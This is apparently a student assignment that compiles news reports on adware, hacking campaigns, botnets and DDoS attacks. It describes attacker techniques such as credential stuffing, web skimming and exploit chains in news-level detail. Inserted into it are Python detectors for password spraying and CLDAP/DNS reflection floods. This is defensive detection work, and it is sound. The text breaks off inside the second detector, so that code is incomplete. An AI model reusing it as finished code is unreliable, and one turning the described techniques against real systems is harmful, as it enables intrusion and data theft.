Cyber and Information Security (Assignment2)

This document discusses cyber and information security topics including adware, hackers, botnets, denial of service attacks, malware, dumpster diving, email and web threats, hacking, cyber terrorism, information warfare and surveillance, virtual crime, identity theft, intellectual property theft, network threats like viruses, worms, spam, spyware, trojans and backdoors, spoofing techniques, session hijacking, sabotage, phishing, bot drones, different types of hackers, and wardriving. It provides 5 real-life examples for each topic to illustrate how they occur and impact users.

Uploaded by

Himanshu Sharma

Cyber and Information Security

HIMANSHU SHARMA
A1OO4819195
BCA-4-C
ASSIGNMENT-2

Write 5 real-life examples of each of the following terms:

(*You may collect the information from different websites, magazines, white
papers, research papers etc.)

Ad-ware, Hacker, Bot & Botnet, DOS, DDOS, Malware, Dumpster Diving, E-mail
threats, Web threats, Hacking, White Hat Hacker, Cyber Terrorism,
Information warfare and surveillance, Virtual Crime, Online Frauds, Identity Theft
and Intellectual property theft, Network threats: Worms, Virus, Spam, Spyware,
Trojans, Backdoors, IP spoofing, ARP spoofing, Session hijacking, Sabotage,
Phishing, Zombie/Zombie Drone, Gray Hat, Wardriving.
What Is Adware?

By definition, adware is any piece of software, malicious or not, that displays advertisements
on a computer. Most often, however, people use the word adware to refer to malicious
software that shows deceptive ads, flashing pop-up windows, large banners, and full-screen
auto-play commercials within their web browser. Its name is a compound of the
words advertising and software.
All adware is designed to generate revenue for its developer every time a user clicks on an
advert it shows. Some types of adware may obstruct your web-surfing experience by
redirecting you to malicious sites with adult content. There are also types that gather your
browsing data without permission and use it to serve you ads that are more relevant to your
tastes and that you will thus be more likely to click on.

Real-life examples of Adware

1. Android Users Hit with ‘Undeletable’ Adware

Researchers say that 14.8 percent of Android users who were targeted with mobile malware
or adware last year were left with undeletable files.

A healthy percentage of Android users targeted by mobile malware or mobile adware last
year suffered a system partition infection, making the malicious files virtually undeletable.

That’s according to research from Kaspersky, which found that 14.8 percent of its users who
suffered such attacks were left with undeletable files. These range from trojans that can
install and run apps without the user’s knowledge, to less threatening, but nevertheless
intrusive, advertising apps.

Moreover, research found that most devices harbor pre-installed default applications that are
also undeletable – the number of those affected varies from 1 to 5 percent of users with low-
cost devices, and reaches 27 percent in extreme cases.

“Infection can happen via two paths: The threat gains root access on a device and installs
adware in the system partition, or the code for displaying ads gets into the firmware of the
device before it even ends up in the hands of the consumer,” according to the firm.

In the latter scenario, this could lead to potentially undesired and unplanned consequences.
For instance, many smartphones have functions providing remote access to the device. If
abused, such a feature could lead to a data compromise of a user’s device.

2. Mobile adware: the silent plague with no origin

According to Check Point Software, 27% of companies worldwide have suffered
attacks on their mobile devices, showing a clear upward trend of sixth-generation
attacks.

We are witnessing a plague of mobile adware, one of the most common forms of
cyber-threats designed to collect personal information from a user’s device.
Roughly 4 billion people are connected to the internet via their smartphone, yet
companies rarely prioritize mobile security. Check Point’s Cyber Security Report
2020 shows that in 2019, 27% of companies suffered a cyber-attack because the
security of a mobile device was breached.

“It only takes one compromised mobile device for cybercriminals to steal
confidential information and access an organization’s corporate
network,” explains Yael Macias, Product Marketing Manager from Check
Point. “More and more mobile threats are created each day, with higher levels of
sophistication and larger success rates. Mobile adware, a form of malware
designed to display unwanted advertisements on a user’s screen, is utilized by
cybercriminals to execute sixth-generation cyber-attacks.”

The enemy is the adware’s point of origin

The main problem with adware is pinpointing how a phone became infected.
Adware is developed to sneak onto a device undetected and without uninstallation
procedures. Removing this type of virus can be extremely difficult, and the
information it collects, such as a device’s operating system, location, images, etc.,
can be a high security risk.

Adware is commonly distributed through mobile apps. According to Statista, there
are 2.5 million apps available to Android and Google Play users and there are 1.8
million apps available on the Apple Store. These figures demonstrate the wide
scope of this kind of attack, giving a clear indication as to why cyber-criminals
focus on mobile devices.
One example of the power of the adware plague is Agent Smith, a new variant of
mobile malware detected last year by Check Point’s researchers. Agent Smith
infected roughly 25 million mobile devices worldwide, without being noticed by
users. To do so, it imitated a Google application and exploited known
vulnerabilities in Android systems, automatically replacing installed applications
with versions containing malicious code, all without the user’s knowledge. It also
exploited the device’s resources by displaying fraudulent ads which could generate
a profit by stealing bank credentials and eavesdropping.

3. Some Android adware apps hide icons to make it hard to remove them

Uninstalling an Android app caught pushing adware is normally simple to deal
with – click and drag it to the top right of the screen and into the trash can.

App gone, ideally followed up with a public-spirited one-star rating on the Google
Play store to alert others to its bad behaviour.

But what happens if there’s no home screen or app tray icon?

New research by SophosLabs has discovered 15 apps on Google Play that install
without icons as part of a campaign to keep themselves on the user’s device.
The motivation is to keep pushing obtrusive ads for as long as possible. But for
some of the apps, the evasion doesn’t stop with disappearing icons.

For example, Flash On Calls & Messages (1 million installs since January 2019)
tries to convince users it never installed properly in the first place.

When first launched, users are greeted with the message “This app is incompatible
with your device!” The app then opens the Play store and navigates to the page for
Google Maps to distract users from the nature of this failure.
Others appear to install, complete with icons, before removing these some days
later. Another trick is to use two different names and icons depending on where it
is displayed. SophosLabs observed:

Nine out of the batch of 15 apps used deceptive application icons and names, most
of which appeared to have been chosen because they might plausibly resemble an
innocuous system app.
As is so often the case, there is no way to spot this kind of app just by looking at it
before installation.
The list of deceptive apps included QR code readers, image editors, backup
utilities, a phone finder, and one that claimed to clean the device of private data.

All detected by SophosLabs were from 2019, with anywhere from 1,000 to 1
million installations.

All were taken down after SophosLabs reported them to Google in July, which
should mean they were automatically de-installed soon after that (see SophosLabs
analysis for the full list).

4. Adware Posing as 85 Photography and Gaming Apps on Google Play Installed Over 8 Million Times

The mobile platform is ubiquitous — enabling users to make online transactions,
run their everyday lives, or even use it in the workplace. It’s no surprise that
fraudsters and cybercriminals would want to cash in on it. Delivering adware, for
example, enables them to monetize affected devices while attempting to be
innocuous. And while they may be viewed as a nuisance at best, mobile ad fraud-
and adware-related incidents became so rampant last year that it cost businesses
hefty financial losses.

We found another example of adware’s potential real-life impact on Google Play.
Trend Micro detects this as AndroidOS_Hidenad.HRXH. It isn’t your run-of-the-
mill adware family: Apart from displaying advertisements that are difficult to
close, it employs unique techniques to evade detection through user behavior and
time-based triggers.

These adware-laden apps posed as 85 photography or gaming applications on
Google Play, where they have netted more than eight million in combined
downloads. We’ve disclosed our findings to Google, and the adware-embedded
apps are no longer on the Play store.

5. Crossrider Adware Still Causing Unwanted Mac Browser Redirects

There exists a pervading urban legend that Apple Macs don’t get viruses. Time and
again this urban legend is proved to be as factual as all the conspiracy theories that
float about online combined. A new variant of the adware Crossrider again proves
the urban legend to be nothing more than an urban legend. While Macs may not
get viruses as they used to be defined (more on this later), they can be infected with
malware.
Crossrider was discovered infecting systems running Mac OS as early as 2013,
with new variants being detected frequently since then. In 2018, a variant was
detected and subsequently analyzed. On its face, the variant was nothing too out of
the ordinary when compared to its earlier cousins. Upon closer analysis, what did
differ was how the new variant achieved its persistence on an infected system.
Persistence is a goal shared by many a malware author—those with a focus on
cyber espionage see persistence on a targeted device as essential, while others see
it as a handy way to keep a thorn in the side of the victim. While some malware
authors and hackers are content to copy those who have gone before them, often
making detection easier, others are far more creative.
Upon analysis, it turned out that the variant discovered in 2018 would alter
configuration settings to remain on the infected system despite efforts to remove it.
By installing a configuration setting, the malware can perform actions on a Mac
that normal software—or, in this case, malware—would not be able to do. In the
case of the 2018 variant, this configuration profile forces both Safari and Chrome
to always open to a page on [Link]. To make matters worse, this setting
could not be changed via the browser’s settings. The configuration profile then
installs another identifier of [Link], which is not visible in
System Preferences.
What, then, separates the new variant discovered recently from the one discovered
in 2018? Honestly, very little. The difference between the newest and the slightly
older variant resides in to which domain the compromised configuration setting
directs victims—[Link], in the latest variant. The two variants even share
the same infection process.

What is Hacking?

Hacking is a general term for a variety of activities that seek to compromise computers and
networks. It refers to any unauthorized intrusion into a device, network, or server which
infringes on the privacy of their owners and users and/or aims to damage or otherwise
compromise computer-based properties like files, programs, and websites. While the term can
also refer to non-malicious activities, it is most often associated with malevolent attempts to
exploit system vulnerabilities for the benefit of the perpetrator.
The people who engage in hacking are commonly referred to as hackers. First used in a 1980
magazine article, this term was popularized a few years later by the movies “Tron” and
“WarGames”. Over the years, hackers have become a staple of popular culture. However, the
usual portrayal of hackers as self-taught, thrill-seeking programming geniuses is not only
stereotypical but also greatly exaggerated.
Although usually technical in nature, hacking doesn’t necessarily require excellent
computational skills. Hackers can also break into computers and systems using social
engineering, a set of psychological tactics designed to trick an unsuspecting target into giving
hackers access to their data. What’s more, while hacking does require at least some grasp of
computer technology, anyone can go to the dark web to purchase the tools they need to carry
out an attack or hire a professional hacker to do it for them.
In addition to fun and thrill, hackers can be motivated by numerous other factors. These
include financial gain, theft of personal data, access to confidential information, the desire to
take down websites, as well as idealism and political activism. While some forms of hacking
are completely legal, most of them are not and are considered criminal offenses. Depending
on the severity of their attack, hackers in the United States can serve anywhere from a few
weeks to 15 years in prison for computer tampering.

Real-life examples of Hacking

1. Credit card skimmer piggybacks on Magento 1 hacking spree

Back in the fall of 2020 threat actors started to massively exploit a vulnerability in
the no-longer maintained Magento 1 software branch. As a result, thousands of e-
commerce shops were compromised and many of them injected with credit card
skimming code.
While monitoring activities tied to this Magento 1 campaign, we identified an e-
commerce shop that had been targeted twice by skimmers. This in itself is not
unusual; multiple infections on the same site are common.
However this case was different. The threat actors devised a version of their script
that is aware of sites already injected with a Magento 1 skimmer. That second
skimmer will simply harvest credit card details from the already existing fake form
injected by the previous attackers.
In the incident we describe in this post, the threat actors also took into account that
an e-commerce site may get cleaned up from a Magento 1 hack. When that
happens, an alternate version of their skimmer injects its own fields that mimic a
legitimate payments platform.
Mass Magento 1 infections

The Magento 1 end-of-life coupled with a popular exploit turned out to be a huge
boon for threat actors. A large number of sites have been hacked indiscriminately
just because they were vulnerable.
RiskIQ attributed these incidents to Magecart Group 12, which has a long history
of web skimming using various techniques including supply-chain attacks.
This skimmer is rather lengthy and contains various levels of obfuscation that
make debugging it more challenging. Although there are variations, the format and
decoy payment form are very much the same.

2. Data on 3.2 million DriveSure clients exposed on hacking forum

Hackers published data on 3.2 million users lifted from DriveSure data on the
Raidforums hacking forum late last month.

To prove the data’s quality, threat actor “pompompurin” detailed the leaked files
and user information in a lengthy post, according to researchers
at Risk Based Security, who were the first to report the breach.

The long post was unusual in that hackers typically only share valuable segments
or trimmed down versions of user databases, the researchers wrote, but in this case,
numerous backend files and folders were leaked.

DriveSure, a service provider for car dealerships that focuses on employee training
programs and customer retention, maintains an abundance of client data. The
information exposed included names, addresses, phone numbers, email addresses,
IP addresses, car makes and models, VIN numbers, car service records and
dealership records, damage claims and 93,063 bcrypt hashed passwords. While
security pros consider bcrypt a strong encryption technique relative to older
methods such as MD5 and SHA1, it is still vulnerable to brute-force attacks
depending on the password strength.

The information leaked was prime for exploitation by other threat actors, especially
for insurance scams, the researchers said. Cybercriminals can use PII, damage
claims, extended car details and dealer and warranty information to target
insurance companies and policyholders as well as break into other valuable
platforms like bank accounts, personal email accounts and corporate systems.

The hackers dumped the data on December 19, 2020, Raidforums said, with the
researchers discovering the exposed DriveSure databases shortly after on Jan. 4.

One leaked folder totaled 22 gigabytes and included the company’s MySQL
databases, exposing 91 sensitive databases. The databases range from detailed
dealership and inventory information, revenue data, reports, claims and client data.

A second compromised folder contained 11,474 files in 105 folders and totals 5.93
GB. Self-identified as “parser files,” they are most likely logs and back-ups of their
databases and contain the same information listed in the SQL databases, the
researcher said.

This was not the first time that “pompompurin” has exposed databases, said Ivan
Righi, cyber threat intelligence analyst at Digital Shadows. The threat actor has
leaked seven other databases in 2021, including those from People’s Energy
Company, Photolamus, Travel Oklahoma, MMG Fusion, Bourse des vols, Capital
Economics and Wemo Media.

“These breaches are not uncommon on Raidforums, and it bears resemblance to
other hacking groups such as ShinyHunters, which exposed close to one billion
user records in 2020,” Righi said. “As the data breaches are being offered for free,
it is likely that the user is attempting to build a reputation for themselves on the
criminal forum.”

3. Microsoft: How 'zero trust' can protect against sophisticated hacking attacks

The variety of techniques used by the SolarWinds hackers was sophisticated yet in
many ways also ordinary and preventable, according to Microsoft.

To prevent future attacks of similar levels of sophistication, Microsoft is
recommending organizations adopt a "zero trust mentality", which disavows the
assumption that everything inside an IT network is safe. That is, organizations
should assume breach and explicitly verify the security of user accounts, endpoint
devices, the network and other resources.

As Microsoft's director of identity security, Alex Weinert, notes in a blogpost, the
three main attack vectors were compromised user accounts, compromised vendor
accounts, and compromised vendor software.
Thousands of companies were affected by the SolarWinds breach, disclosed in
mid-December. The hackers, known as UNC2452/Dark Halo, targeted the build
environment for SolarWinds' Orion software, tampering with the process when a
program is compiled from source code to a binary executable deployed by
customers.

US security vendor Malwarebytes yesterday disclosed it was affected by the same
hackers but not via the tainted Orion updates. The hackers instead breached
Malwarebytes by exploiting applications with privileged access to Office 365 and
Azure infrastructure, giving the attackers "access to a limited subset" of
Malwarebytes' internal emails.
According to Weinert, the attackers exploited gaps in "explicit verification" in each
of the main attack vectors. 
"Where user accounts were compromised, known techniques like password spray,
phishing, or malware were used to compromise user credentials and gave the
attacker critical access to the customer network," Weinert writes.  
He argues cloud-based identity systems like Azure Active Directory (Azure AD)
are more secure than on-premises identity systems because the latter lack cloud-
powered protections like Azure AD's password protection to weed out weak
passwords, recent advances in password spray detection, and enhanced AI for
account compromise prevention.
In cases where the actor succeeded, Weinert notes that highly privileged vendor
accounts lacked additional protections such as multi-factor authentication (MFA),
IP range restrictions, device compliance, or access reviews. Microsoft has found
that 99.9% of the compromised accounts it tracks every month don't use MFA. 
MFA is an important control, as compromised high-privilege accounts could be
used to forge SAML tokens to access cloud resources. As the NSA noted in its
warning after the SolarWinds hack was disclosed: "if the malicious cyber actors
are unable to obtain a non-premises signing key, they would attempt to gain
sufficient administrative privileges within the cloud tenant to add a malicious
certificate trust relationship for forging SAML tokens."
This attack technique could be thwarted too if there were stricter permissions on
user accounts and devices. 

"Even in the worst case of SAML token forgery, excessive user permissions and
missing device and network policy restrictions allowed the attacks to progress,"
notes Weinert. 

"The first principle of Zero Trust is to verify explicitly – be sure you extend this
verification to all access requests, even those from vendors and especially those
from on-premises environments." 

The Microsoft veteran finally offers a reminder why least-privileged access is
critical to minimizing an attacker's opportunities for moving laterally once inside a
network. This should help to compartmentalize attacks by restricting access to an
environment from a user, device, or network that's been compromised.

With Solorigate – the name Microsoft uses for the SolarWinds malware – the
attackers "took advantage of broad role assignments, permissions that exceeded
role requirements, and in some cases abandoned accounts and applications that
should have had no permissions at all," Weinert notes. 

Weinert admits the SolarWinds hack was a "truly significant and advanced attack",
but the risk from the techniques the attackers used can be significantly reduced or
mitigated with these best practices.

4. A Chinese hacking group is stealing airline passenger details

A suspected Chinese hacking group has been attacking the airline
industry for the past few years with the goal of obtaining passenger
data in order to track the movement of persons of interest.

The intrusions have been linked to a threat actor that the cyber-security
industry has been tracking under the name of Chimera.
Believed to be operating in the interests of the Chinese state, the
group's activities were first described in a report [PDF] and Black Hat
presentation [PDF] from CyCraft in 2020.
The initial report mentioned a series of coordinated attacks against the
Taiwanese superconductor industry.

But in a new report published last week by NCC Group and its
subsidiary Fox-IT, the two companies said the group's intrusions are
broader than initially thought, having also targeted the airline
industry.
"NCC Group and Fox-IT observed this threat actor during various
incident response engagements performed between October 2019
and April 2020," the two companies said.

These attacks targeted semiconductor and airline companies in
different geographical areas, and not just Asia, NCC and Fox-IT said.

In the case of some victims, the hackers stayed hidden inside
networks for up to three years before being discovered.

HACKERS SCRAPED USER DATA FROM THE RAM OF FLIGHT BOOKING SERVERS

While the attacks orchestrated against the semiconductor industry
were aimed towards the theft of intellectual property (IP), the attacks
against the airline industry were focused instead on something else.

"The goal of targeting some victims appears to be to obtain Passenger
Name Records (PNR)," the two companies said.
"How this PNR data is obtained likely differs per victim, but we
observed the usage of several custom DLL files used to continuously
retrieve PNR data from memory of systems where such data is
typically processed, such as flight booking servers."

A TYPICAL CHIMERA ATTACK

The joint NCC and Fox-IT report also describes the Chimera group's
typical modus operandi, which usually begins with collecting user
login credentials that leaked in the public domain after data breaches
at other companies.

This data is used for credential stuffing or password spraying attacks
against a target's employee services, such as email accounts. Once in,
the Chimera operators search for login details for corporate systems,
such as Citrix systems and VPN appliances.
Once inside an internal network, the intruders usually deploy Cobalt
Strike, a penetration-testing framework used for "adversary
emulation," which they use to move laterally to as many systems as
possible, searching for IP and passenger details.

The two security firms said the hackers were patient and thorough and
would search until they found ways to traverse across segmented
networks to reach systems of interest.

Once they found and collected the data they were after, this
information was regularly uploaded to public cloud services like
OneDrive, Dropbox, or Google Drive, knowing that traffic to these
services wouldn't be inspected or blocked inside breached networks.
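Both the Microsoft write-up above (password spray as a route into user accounts) and the Chimera description (password spraying against employee services such as email) turn on the same pattern: one source trying a few passwords against many distinct accounts. The following detector is an added example written for this page, not code from Microsoft, NCC Group or Fox-IT; it runs over a constructed, simplified authentication log (timestamp, source IP, account, result) and flags sources whose failures span many accounts with only a handful of attempts each, then lists the accounts that later succeeded from such a source.

```python
"""Password-spray detector over constructed authentication log lines."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from any real system): ISO time, source IP, account, result.
# 203.0.113.7 tries six accounts once each and then succeeds against "grace" (spray).
# 198.51.100.9 fails twice on one account then succeeds (ordinary user typo, not a spray).
SAMPLE_LOG = """\
2020-03-02T08:00:01Z 203.0.113.7 alice FAIL
2020-03-02T08:00:04Z 203.0.113.7 bob FAIL
2020-03-02T08:00:07Z 203.0.113.7 carol FAIL
2020-03-02T08:00:10Z 203.0.113.7 dave FAIL
2020-03-02T08:00:13Z 203.0.113.7 erin FAIL
2020-03-02T08:00:16Z 203.0.113.7 frank FAIL
2020-03-02T08:00:19Z 203.0.113.7 grace SUCCESS
2020-03-02T08:05:00Z 198.51.100.9 alice FAIL
2020-03-02T08:05:30Z 198.51.100.9 alice FAIL
2020-03-02T08:06:00Z 198.51.100.9 alice SUCCESS
2020-03-02T09:30:00Z 192.0.2.44 heidi FAIL
2020-03-02T09:30:05Z 192.0.2.44 ivan FAIL
"""


def parse_line(line):
    """Split one constructed log line into (datetime, ip, account, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result


def detect_spray(log_text, window=timedelta(minutes=10),
                 min_accounts=5, max_per_account=2):
    """Return {source_ip: sorted accounts} for sources that, inside any sliding
    `window`, failed against at least `min_accounts` distinct accounts while
    trying each account no more than `max_per_account` times.  Many accounts with
    few tries each is the spray signature; many tries on one account would be a
    brute force and is deliberately not flagged here."""
    failures = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, ip, user, result = parse_line(line)
        if result == "FAIL":
            failures[ip].append((ts, user))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start so events[start:end+1] spans <= window.
            while events[end][0] - events[start][0] > window:
                start += 1
            per_account = defaultdict(int)
            for _, user in events[start:end + 1]:
                per_account[user] += 1
            if (len(per_account) >= min_accounts
                    and max(per_account.values()) <= max_per_account):
                alerts.setdefault(ip, set()).update(per_account)
    return {ip: sorted(users) for ip, users in alerts.items()}


def successes_from_spraying_sources(log_text, alerts):
    """Accounts that logged in successfully from a flagged source: these are the
    credentials to reset (and sessions to revoke) first."""
    hits = []
    for line in log_text.strip().splitlines():
        _, ip, user, result = parse_line(line)
        if result == "SUCCESS" and ip in alerts:
            hits.append((ip, user))
    return hits


if __name__ == "__main__":
    found = detect_spray(SAMPLE_LOG)
    for ip, users in found.items():
        print(f"spray from {ip} against {len(users)} accounts: {', '.join(users)}")
    for ip, user in successes_from_spraying_sources(SAMPLE_LOG, found):
        print(f"SUCCESSFUL login from spraying source {ip}: account {user}")
```

Real-world tuning differs per environment (thresholds, and grouping by ASN or user agent rather than a single IP, since sprays are often spread across many sources), but the windowed "distinct accounts versus attempts per account" ratio is the core of the detection.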

TRACKING TARGETS OF INTEREST

While the NCC and Fox-IT report didn't speculate why the hackers
targeted the airline industry and why they stole passenger data, this is
pretty obvious.

In fact, it is very common for state-sponsored hacking groups to target
airline companies, hotel chains, and telcos to obtain data they could
use to track the movements and communications of persons of
interest.

Past examples include Chinese group APT41, which targeted telcos
with special malware capable of stealing SMS messages. The attacks
were believed to be related to China's efforts to track its Uyghur
minority, with some of these efforts involving hacking telcos to track
Uyghur travelers' movements.
Another Chinese group that targeted telcos was APT10 (or Gallium),
whose activities were detailed in Cybereason's Operation Soft Cell
report.
In addition, Chinese state-sponsored hackers were also linked to the
Marriott hack, during which they stole troves of hotel reservation
details going back years.
But China isn't the only one engaging in these types of attacks.

Iranian group APT39 has also been linked to breaches
at telecommunication providers and travel companies for the purpose
of tracking Iranian dissidents, while another Iranian group, known as
Greenbug, has been linked to hacks against multiple telecom
providers across Southeast Asia.
Then there's Operation Specialist, a UK GCHQ operation that
targeted Belgian telco Belgacom between 2010 and 2013.

5. Google reveals sophisticated Windows and Android hacking operation

Google published a six-part report today detailing a sophisticated hacking
operation that the company detected in early 2020 and which targeted owners of
both Android and Windows devices.
The attacks were carried out via two exploit servers delivering different exploit
chains via watering hole attacks, Google said.
"One server targeted Windows users, the other targeted Android," Project Zero,
one of Google's security teams, said in the first of six blog posts.
Google said that both exploit servers used Google Chrome vulnerabilities to gain
an initial foothold on victim devices. Once an initial entry point was established in
the user's browsers, attackers deployed an OS-level exploit to gain more control of
the victim's devices.

The exploit chains included a combination of both zero-day and n-day
vulnerabilities, where zero-day refers to bugs unknown to the software makers, and
n-day refers to bugs that have been patched but are still being exploited in the wild.

All in all, Google said the exploit servers contained:

- Four "renderer" bugs in Google Chrome, one of which was still a 0-day at
the time of its discovery.
- Two sandbox escape exploits abusing three 0-day vulnerabilities in the
Windows OS.
- And a "privilege escalation kit" composed of publicly known n-day exploits
for older versions of the Android OS.

The four zero-days, all of which were patched in the spring of 2020, were as
follows:

- CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
- CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
- CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
- CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)
Google said that while they did not find any evidence of Android zero-day exploits
hosted on the exploit servers, its security researchers believe that the threat actor
most likely had access to Android zero-days as well, but most likely weren't
hosting them on the servers when its researchers discovered it.

GOOGLE: EXPLOIT CHAINS WERE COMPLEX AND WELL-ENGINEERED

Overall, Google described the exploit chains as "designed for efficiency &
flexibility through their modularity."

"They are well-engineered, complex code with a variety of novel exploitation
methods, mature logging, sophisticated and calculated post-exploitation
techniques, and high volumes of anti-analysis and targeting checks," Google said.

"We believe that teams of experts have designed and developed these exploit
chains," but Google stopped short of providing any other details about the attackers
or the type of victims they targeted.

Together with its introductory blog post, Google has also published reports
detailing a Chrome "infinity bug" used in the attacks, the Chrome exploit chains,
the Android exploit chains, post-exploitation steps on Android devices, and
the Windows exploit chains.
The provided details should allow other security vendors to identify attacks on
their customers and track down victims and other similar attacks carried out by the
same threat actor.

Article title updated shortly after publication, changing the term "massive" to
"sophisticated" as there is no information on the scale of this operation to support
the initial wording.

What Is a Botnet?

A compound of the words robot and network, a botnet is a group of remote-controlled
computers coordinated together to perform malicious tasks. A single botnet can comprise
anywhere between a few hundred and a few million computers, commonly referred to as bots
(short for robots).
Botnets can gain access to your machine via a malicious software installation, a direct hacker
attack, or an automated program that monitors the internet in search of security deficiencies
(i.e. a lack of antivirus protection) to exploit. If your computer or any other internet-
connected device is infected with malware, it could be one of the bots that make up a botnet.
If that’s the case, all other computers and devices in your network are also at risk of
becoming part of the same botnet.
All computers in a botnet are remote-controlled by either a hacker or a piece of command-
and-control software they have developed. Also known as a “zombie army”, these computers
can be used by the botnet owner to send out spam emails, shut down websites, or generate
revenue by creating fake internet traffic or advertising paid downloads of fraudulent botnet
removal software.
As with many other technologies, botnets weren’t originally designed for malicious purposes.
In the early days of the world wide web, they were primarily used to host Internet Relay Chat
(IRC) networks. However, it didn’t take hackers too long to identify the main security
vulnerabilities of the original botnets and to start exploiting these insufficiencies for their
own gain.
Nowadays, botnets are a major cybersecurity threat that can take down large computer
networks in a matter of seconds and keep them down for hours, if not days. Hackers use
botnets mainly because the power of a “zombie army” hundreds of thousands strong allows
them to carry out much larger attacks than they otherwise could. In addition, hiding behind so
many computers makes it possible for them to disguise the actual source of the attack and
avoid getting caught and punished for their cybercrimes.

Real-life examples of botnet attacks

Powerful botnets were responsible for some of the largest, most devastating cyber attacks in
the last few years. The most notable examples include the following:
• The 2018 GitHub Attack – In February 2018, a large botnet carried out the largest
DDoS attack ever recorded. Generating peak incoming traffic of an unprecedented
1.35Tbps, the attack took GitHub, the largest software development platform on the
internet, offline for a few minutes.
• The 2014 Hong Kong Attack – The 2014 political unrest in Hong Kong provoked
the then-largest DDoS attack in history when at least a few large botnets joined forces
against pro-democracy websites in the country. Many have accused the Chinese
government of this attack, but the actual perpetrator remains unknown.
• The 2016 Mirai Attack – Named after a popular anime series, Mirai was a botnet
consisting of more than 100,000 computers. It made the news in 2016, when it
launched attacks against several cybersecurity companies, generating traffic volumes
of 1Tbps and taking down a large part of their online infrastructure.

What is a DDoS Attack?

A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the
normal traffic of a targeted server, service or network by overwhelming the target
or its surrounding infrastructure with a flood of Internet traffic.
DDoS attacks achieve effectiveness by utilizing multiple compromised computer
systems as sources of attack traffic. Exploited machines can include computers and
other networked resources such as IoT devices.
From a high level, a DDoS attack is like an unexpected traffic jam clogging up the
highway, preventing regular traffic from arriving at its destination.

The Top-Five Most Famous DDoS Attacks

To give you insight into what these attacks are like “in the wild,” we’re going to take a look
at some of the most notable DDoS attacks to date. Some of our choices are famous for their
sheer scale, while others are included because of their impact and consequences.

1. The Google Attack, 2017

On October 16, 2020, Google’s Threat Analysis Group (TAG) posted a blog update
discussing how the threats and threat actors are changing their tactics due to the 2020 U.S.
election. At the end of the post, the company snuck in a note:
In 2017, our Security Reliability Engineering team measured a record-breaking UDP
amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and
9394), which remains the largest bandwidth attack of which we are aware.

Launched from three Chinese ISPs, the attack on thousands of Google’s IP addresses lasted
for six months and peaked at a breath-taking 2.5 Tbps. Damian Menscher, a Security
Reliability Engineer at Google, wrote:

The attacker used several networks to spoof 167 Mpps (millions of packets per second) to
180,000 exposed CLDAP, DNS, and SMTP servers, which would then send large responses
to us. This demonstrates the volumes a well-resourced attacker can achieve. This was
four times larger than the record-breaking 623 Gbps attack from the Mirai botnet a year
earlier.

2. The AWS DDoS Attack in 2020

Amazon Web Services, the 800-pound gorilla of everything cloud computing, was hit by a
gigantic DDoS attack in February 2020. This was the most extreme recent DDoS attack ever
and it targeted an unidentified AWS customer using a technique called Connectionless
Lightweight Directory Access Protocol (CLDAP) Reflection. This technique relies on
vulnerable third-party CLDAP servers and amplifies the amount of data sent to the victim’s
IP address by 56 to 70 times. The attack lasted for three days and peaked at an astounding 2.3
terabytes per second.
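The reflection pattern described in the Google and AWS entries above, turned into a defender's check. This is an added example, not code from any of the articles quoted: it scans NetFlow-style records (constructed sample data; the reflector port list, field names and thresholds are assumptions) for large UDP responses arriving from many reflector service ports at a single address.

```python
"""Reflection/amplification detection over flow records (added illustration)."""
from collections import defaultdict
from dataclasses import dataclass

# UDP services named on this page as reflectors: CLDAP on 389/udp, DNS on 53/udp.
# Assumed list for the example; extend it for your own environment.
REFLECTOR_PORTS = {389: "CLDAP", 53: "DNS"}


@dataclass(frozen=True)
class Flow:
    """One NetFlow-like record (assumed field names)."""
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    nbytes: int


def is_reflection_candidate(flow: Flow, min_avg_bytes: int = 1000) -> bool:
    """A reflected response arrives FROM a reflector's service port and is large.

    A legitimate answer from a resolver is small; amplified CLDAP/DNS answers
    fill the packet. The 1000-byte average is an assumed tuning value.
    """
    if flow.proto != "UDP" or flow.src_port not in REFLECTOR_PORTS:
        return False
    if flow.packets <= 0:
        return False
    return flow.nbytes / flow.packets >= min_avg_bytes


def summarize_reflection(flows, min_sources: int = 3, min_avg_bytes: int = 1000) -> dict:
    """Group candidate flows by victim address and alert when many distinct
    reflectors hit the same address: the signature of a spoofed-source attack."""
    by_victim = defaultdict(lambda: {"sources": set(), "services": set(),
                                     "bytes": 0, "packets": 0})
    for f in flows:
        if not is_reflection_candidate(f, min_avg_bytes):
            continue
        entry = by_victim[f.dst_ip]
        entry["sources"].add(f.src_ip)
        entry["services"].add(REFLECTOR_PORTS[f.src_port])
        entry["bytes"] += f.nbytes
        entry["packets"] += f.packets

    alerts = {}
    for victim, e in by_victim.items():
        if len(e["sources"]) >= min_sources:
            alerts[victim] = {
                "sources": len(e["sources"]),
                "services": sorted(e["services"]),
                "total_bytes": e["bytes"],
                "avg_bytes_per_packet": round(e["bytes"] / e["packets"], 1),
            }
    return alerts


# Constructed sample flows using documentation-range addresses, not real hosts.
SAMPLE_FLOWS = [
    # Four different CLDAP servers answering to a port the victim never queried from.
    Flow("192.0.2.11", 389, "203.0.113.10", 41234, "UDP", 1000, 1_500_000),
    Flow("192.0.2.12", 389, "203.0.113.10", 41234, "UDP", 1000, 1_500_000),
    Flow("192.0.2.13", 389, "203.0.113.10", 41234, "UDP", 1000, 1_500_000),
    Flow("192.0.2.14", 389, "203.0.113.10", 41234, "UDP", 1000, 1_500_000),
    # A DNS reflector joining the same flood.
    Flow("192.0.2.53", 53, "203.0.113.10", 41234, "UDP", 500, 700_000),
    # A normal DNS answer to another host: small packets, not flagged.
    Flow("192.0.2.53", 53, "198.51.100.5", 55123, "UDP", 20, 2_000),
    # TCP LDAP from port 389 is not UDP reflection and is ignored.
    Flow("192.0.2.15", 389, "203.0.113.10", 41234, "TCP", 50, 60_000),
]

if __name__ == "__main__":
    for victim, info in summarize_reflection(SAMPLE_FLOWS).items():
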